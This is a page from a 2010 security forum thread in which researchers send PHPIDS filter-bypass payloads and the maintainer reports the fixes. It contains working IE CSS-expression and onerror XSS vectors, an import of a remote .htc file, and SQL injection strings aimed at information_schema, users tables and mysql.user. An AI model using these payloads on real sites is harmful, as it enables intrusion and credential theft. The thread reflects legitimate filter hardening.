Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Whether this is about ha.ckers.org, sla.ckers.org or some other project you are interested in or want to talk about, throw it in here to get feedback. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Pages: PreviousFirst...2122232425262728293031Next
Current Page: 29 of 31
Re: PHPIDS 0.6.3.1 - the release without a name
Posted by: Gareth Heyes
Date: April 19, 2010 04:51PM

One slash off, sorry I didn't have time to make it executable. IE7 or IE8 compat IE7

<div style=x=expressio\n(scripts.item(0).src&nbsp;=&nbsp;&nbsp;alt&nbsp;) alt=/0x.lv>

Challenge can you get the extra slash....

or maybe get a "a":-
<div style=x=expressio\n(scripts.item(0).text&nbsp;=&nbsp;&nbsp;alt&nbsp;) alt=lert(1) title=a>

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: PHPIDS 0.6.3.1 - the release without a name
Posted by: Anonymous User
Date: April 19, 2010 05:18PM

Omg - awesome stuff! I had something own to add but fixed it silently. I will add the rest of the fixes on Saturday - this week is pretty busy but I do care and will take care of those - thx and very much appreciated! Here's my jizz btw - IE8 is quite awesome inside style attributes when replacing delimiters with exclamation marks - not sure yet why but will put some research into it as soon as i find the time

<div>
<style>*{background:url('a\'!!!x:expression(write(1))}</style>
</div>

<div style=background:url('a\'!!!x:expression(write(1));')></div>

Options: ReplyQuote
Re: PHPIDS 0.6.3.1 - the release without a name
Posted by: Anonymous User
Date: April 19, 2010 05:21PM

@Gareth now the = trick is public - what hast thou done :D

Options: ReplyQuote
Re: PHPIDS 0.6.3.1 - the release without a name
Posted by: LeverOne
Date: April 19, 2010 10:50PM

So, guys, what we have at the moment?

Works all (tested in IE 8).

1. Symbol !

<div style="background:url('a'!!!x:expression(write(1));"></div> // invalid property background

<div style="background:url('a'!;x:expression(write(1));"></div> // invalid property background

<div style="background:url('a')!!x:expression(write(1));"></div> // valid property background

Conclusion: ! - is equivalent ( or ) url property breaker. !! - is separator properties (equivalent ;)

2. Symbol }

Go Next --> (look at my vector before).

<div style="background:url('a')}x:expression(write(1));"></div> // valid property background
<div style="background:url('a'}}x:expression(write(1));"></div> // invalid property background
<div style="background:url{'a'}}x:expression(write(1));"></div> // invalid property background

Conclusion: } - is url property breaker, and separator properties (equivalent ;)

3. Symbols ",'

Go Next --> http://sla.ckers.org/forum/read.php?2,29779,page=2

<div style="background:url('a'';x:expression(write(1));"></div> // invalid property background


Conclusion: ' - is equivalent ( or ) only url property breaker, and not a separator properties.

This is very very beautiful, guys!

LeverOne

----------------------
~Veritas~



Edited 4 time(s). Last edit at 04/20/2010 05:55AM by LeverOne.

Options: ReplyQuote
Re: PHPIDS 0.6.3.1 - the release without a name
Posted by: Gareth Heyes
Date: April 20, 2010 01:50AM

@mario

Hehe it was public long ago :)
<////////////////style========xss=expression(window.x?0:(alert(/XSS/),window.x=1))>

http://www.businessinfo.co.uk/labs/talk/xsstalk.zip

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: PHPIDS 0.6.3.1 - the release without a name
Posted by: Anonymous User
Date: April 20, 2010 05:38AM

@Gareth there's public and there's public ;)

@LeverOne - just to catch up - I put this one on Twitter yesterday night:

</*\/style=!!!\*/-!!!=exp\r/*expr\*/essio\n(!!!write(2))!!!<> Time to go to bed!!/**/!

Any chance to see you there? Not sure if u have an account/use it already. Would be awesome!

Options: ReplyQuote
Re: PHPIDS 0.6.3.1 - the release without a name
Posted by: Gareth Heyes
Date: April 20, 2010 06:00AM

@mario

I blame sdc:-
http://sla.ckers.org/forum/read.php?12,33287,34204,page=2#msg-34076

I knew I shouldn't have sent him my pres :)

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: PHPIDS 0.6.3.1 - the release without a name
Posted by: LeverOne
Date: April 20, 2010 07:18AM

@mario
Yep, breaker URL properties - is not the only possible function of the symbol "!" . Your vector proves the fact that this character does not break expression. But breaking in url and delimiting properties via "!" - it's your great discovery.
This discovery, together with my and Gareth's discoveries, "rules the world now". :)

Twitter ... When I will have inspiration, I'll be there and let you know. But I'm afraid to follow 1337 sources of information.

LeverOne

----------------------
~Veritas~



Edited 1 time(s). Last edit at 04/20/2010 07:18AM by LeverOne.

Options: ReplyQuote
Re: PHPIDS 0.6.3.1 - the release without a name
Posted by: Gareth Heyes
Date: April 20, 2010 07:54AM

@LeverOne

Actually url breakers work without "!" try any alphanumeric character after a quote ;)

Who are you? Me and mario are nosey :P blog or twitter c'mon

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: PHPIDS 0.6.3.1 - the release without a name
Posted by: LeverOne
Date: April 20, 2010 08:31AM

@Gareth

Quote

> Actually url breakers work without "!" try any
> alphanumeric character after a quote ;)

+1, many characters (not only alnum)
<div style="background:url('a'(!!x:expression(write(1));"></div>

Quote

> Who are you? Me and mario are nosey :P
Okay, I confess... I'm... I'm... Batman... o_O

Quote

blog or twitter c'mon
Later, Saturday.

----------------------
~Veritas~

Options: ReplyQuote
Re: PHPIDS 0.6.3.1 - the release without a name
Posted by: Anonymous User
Date: April 20, 2010 08:34AM

Yep - confirmed

<style>*{font-family=`!/a:expression(write(1))!'<b>

Batman. I knew it. @Gareth see - I told you all the time but nooo - cannot be u said :P

Options: ReplyQuote
Re: PHPIDS 0.6.3.1 - the release without a name
Posted by: Gareth Heyes
Date: April 20, 2010 08:47AM

nanananannanannananannannana



------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: PHPIDS 0.6.3.1 - the release without a name
Posted by: LeverOne
Date: April 23, 2010 08:26PM

lo=/,Batman/,alert('Batman flew here')



@thornmaker, thanks, originally i meant this.

----------------------
~Veritas~



Edited 2 time(s). Last edit at 04/24/2010 07:51AM by LeverOne.

Options: ReplyQuote
Re: PHPIDS 0.6.3.1 - the release without a name
Posted by: thornmaker
Date: April 23, 2010 10:50PM

@LeverOne nice one! except... s/;//g

Options: ReplyQuote
Re: PHPIDS 0.6.3.1 - the release without a name
Posted by: LeverOne
Date: April 24, 2010 08:59AM

// in xss.htc --> TAGNAME="*"

<?xml:namespace prefix=xss><?import namespace=xss implementation=http://ha.ckers.org/xss.htc><xss:*>lo</xss:*>

----------------------
~Veritas~

Options: ReplyQuote
Re: PHPIDS 0.6.3.1 - the release without a name
Posted by: Anonymous User
Date: April 24, 2010 10:47AM

Nice ones! All fixed - plus some new features like wildcard extensions. Thx

Options: ReplyQuote
Re: PHPIDS 0.6.3.1 - the release without a name
Posted by: LeverOne
Date: April 24, 2010 12:16PM

Quote

All fixed

Not yet. :)

For pages without "Doctype" ("\" ignored):
<a style="background:url(//mh.mh/\)!*mh:expression\(write\(1\));">lo</a> // you discovered

and look: http://sla.ckers.org/forum/read.php?12,30425,page=28#msg-34198

----------------------
~Veritas~



Edited 1 time(s). Last edit at 04/24/2010 12:22PM by LeverOne.

Options: ReplyQuote
Re: PHPIDS 0.6.3.1 - the release without a name
Posted by: LeverOne
Date: April 25, 2010 07:50AM

FF & IE

<img src=http://lo.lo/lo = '> ' onerror=alert(1)//

PHPIDS is good already, but will be even better.

----------------------
~Veritas~

Options: ReplyQuote
Re: PHPIDS 0.6.3.1 - the release without a name
Posted by: Anonymous User
Date: April 25, 2010 09:37AM

Phew - those were both tough ones! Again the problem "HTMLPurifier bypass === PHPIDS HTML mode bypass". I added fixes and tests - although I think they might not be perfect and reek a bit. The challenge was to detect patterns in the Purifier bypasses and eliminate them before the actual string diff happens in the PHPIDS. Fixed for now :)

Thanks!

Ah - I wrote Edward two mails about the bypasses - let's see what happens - I hope to be able to get rid of the specific fixes asap :D

Awesome stuff, LeverOne! Plain incredible

This one was headache generator number one :)
<a style=background:url(/\)!@x:expression\(write\(1\));></a>

Ah and HTMLawed seems bypassable too with this trick. It's maintained by patnaik from this board - right?

Options: ReplyQuote
Re: PHPIDS 0.6.3.1 - the release without a name
Posted by: LeverOne
Date: April 25, 2010 10:26AM

100500 filters are bypassable with this and other tricks. Let the authors have their fingers on the pulse of events.

----------------------
~Veritas~



Edited 1 time(s). Last edit at 04/25/2010 10:41AM by LeverOne.

Options: ReplyQuote
Re: PHPIDS 0.6.3.1 - the release without a name
Posted by: LeverOne
Date: April 26, 2010 10:40AM

Becoming harder and harder ... :)

<div style="color:white;>;lo:expression\28\77rite\28 1\29\29;

----------------------
~Veritas~



Edited 1 time(s). Last edit at 04/26/2010 10:41AM by LeverOne.

Options: ReplyQuote
Re: PHPIDS 0.6.3.1 - the release without a name
Posted by: Gareth Heyes
Date: April 26, 2010 11:13AM

@LeverOne

I say you switch off the checkbox and take it up a notch :)

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 1 time(s). Last edit at 04/26/2010 11:13AM by Gareth Heyes.

Options: ReplyQuote
Re: PHPIDS 0.6.3.1 - the release without a name
Posted by: Reiners
Date: April 29, 2010 02:55AM

just read that there are more whitespaces working on mysql. I wonder that my script did not detect them because I bruteforced them all. However, if they work (could not test yet) here we go:

http://demo.php-ids.org/?test=%27sounds%20like%281%29%20union%19%28select%191,group_concat%28table_name%29,3%19from%19information_schema.%60tables%60%29%23%28
http://demo.php-ids.org/?test=%27sounds%20like%281%29union%19select%191,group_concat%28column_name%29,3%19from%19information_schema.%60columns%60where%28table_name%29=0x7573657273%23
http://demo.php-ids.org/?test=Text%27sounds%20like%281%29%20union%19%28select%19id,user,pass%19from%60users%60%29%23%28Text

Impact: 0

other whitespaces around %01-%0b are detected by the "dangerous characters" rule.

edit:
now tested on mysql 5.1.36 and %01,%02,...%19 does not work. maybe I translated the article wrongly? However they use them in their sample injections.



Edited 2 time(s). Last edit at 04/29/2010 10:02AM by Reiners.

Options: ReplyQuote
Re: PHPIDS 0.6.3.1 - the release without a name
Posted by: Anonymous User
Date: May 01, 2010 08:08AM

@Reiners:
Quote

I Have @ Reiners wrote an email to you:)
What did he say? I can't get it running either - on all tested DBMS. Nevertheless I added some of the mentioned characters to the "evil characters" array. One never knows :)

@LeverOne I fixed the vector - thanks to the (not perfect yet) release of HTMLPurifier 4.1.0 I could remove several of the regexes we had to develop the recent days and weeks. Awesome work!

Thanks a lot!

Options: ReplyQuote
Re: PHPIDS 0.6.3.1 - the release without a name
Posted by: Reiners
Date: May 01, 2010 11:19AM

it works on his setup, we are working on finding out what is causing the difference. But yes, you should add them to the filter list ;)

Options: ReplyQuote
Re: PHPIDS 0.6.3.1 - the release without a name
Posted by: Reiners
Date: May 07, 2010 04:54AM

no news yet about the "evil characters".
meantime a simple 1 or 1=1

http://demo.php-ids.org/?test=0'like(0)%20and%201%20sounds%20like%20(@a)%20or%20true%231

Options: ReplyQuote
Re: PHPIDS 0.6.3.1 - the release without a name
Posted by: Reiners
Date: May 09, 2010 01:11PM

by accident the author only tested the "evil characters" between "-- -" as a whitespace alternative. they dont work in the query itself.

Options: ReplyQuote
Re: PHPIDS 0.6.3.1 - the release without a name
Posted by: Anonymous User
Date: May 09, 2010 02:35PM

@Reiners haha okay - too (bad|good) - all fixed btw - thanks!

Options: ReplyQuote
Re: PHPIDS 0.6.3.1 - the release without a name
Posted by: lightos
Date: May 18, 2010 08:15PM

Progression of a bypass:
2a'-1^ ' 0
2a'-1^ ' 0' and '' like '
2a'-1^ ' 0' and (select 1) rlike '1
2a'-1^ ' 0' and (select`user`from`mysql`.user limit 1) rlike 'root
2a'-1^ ' 0' and (select mid(user,1 /1,1/ 1)from`mysql`.user limit 1) rlike 'r

Options: ReplyQuote
Re: PHPIDS 0.6.3.1 - the release without a name
Posted by: Reiners
Date: June 29, 2010 02:37PM

0'rlike(0)and 1 rlike (@a)or true - ' 0

see you on thursday!



Edited 1 time(s). Last edit at 06/29/2010 02:38PM by Reiners.

Options: ReplyQuote
Pages: PreviousFirst...2122232425262728293031Next
Current Page: 29 of 31


Sorry, only registered users may post in this forum.